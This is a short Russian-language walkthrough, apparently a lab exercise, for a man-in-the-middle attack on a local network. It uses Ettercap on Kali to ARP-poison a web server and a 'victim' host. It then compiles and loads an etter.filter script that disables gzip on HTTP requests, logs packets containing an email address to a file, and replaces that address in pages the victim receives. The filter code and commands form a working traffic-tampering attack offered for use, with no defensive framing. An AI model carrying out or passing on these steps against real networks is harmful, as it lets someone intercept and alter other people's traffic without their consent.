Цель: модифицировать трафик, идущий с web-сервера в локальной сети, к компьютеру жертвы.

Ettercap:

  1. Меню Sniff -> Unified sniffing…
  2. Меню Hosts -> Scan for hosts
  3. Меню Hosts -> Hosts list
  4. Выбираем первый хост (web-сервер), жмем Add to Target 1
  5. Выбираем второй хост (компьютер жертвы), жмем Add to Target 2 (порядок не важен)
  6. Меню Mitm -> ARP poisoning… (Optional parameters: v — Sniff remote connections)

Файл etter.filter

if (ip.proto == TCP && tcp.dst == 80 ) {
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    ");
      msg("gzip off.\n");
   }
}

if (ip.proto == TCP && search(DATA.data, "test@test.ru") ) {
   log(DATA.data, "/tmp/mispelled_ettercap.log");
   replace("test@test.ru", "new@new.ru");
   msg("Correctly replaced and logged.\n");
}

Вводим команду в консоли Kali:

etterfilter etter.filter -o etter.filter.out

Ettercap:

  1. Меню Filters -> Load a filter… -> выбираем файл etter.filter.out, полученный в результате предыдущей команды.

После этого на компьютере жертвы, при запросе страницы с www-сервера, адрес test@test.ru в странице должен подмениться на new@new.ru.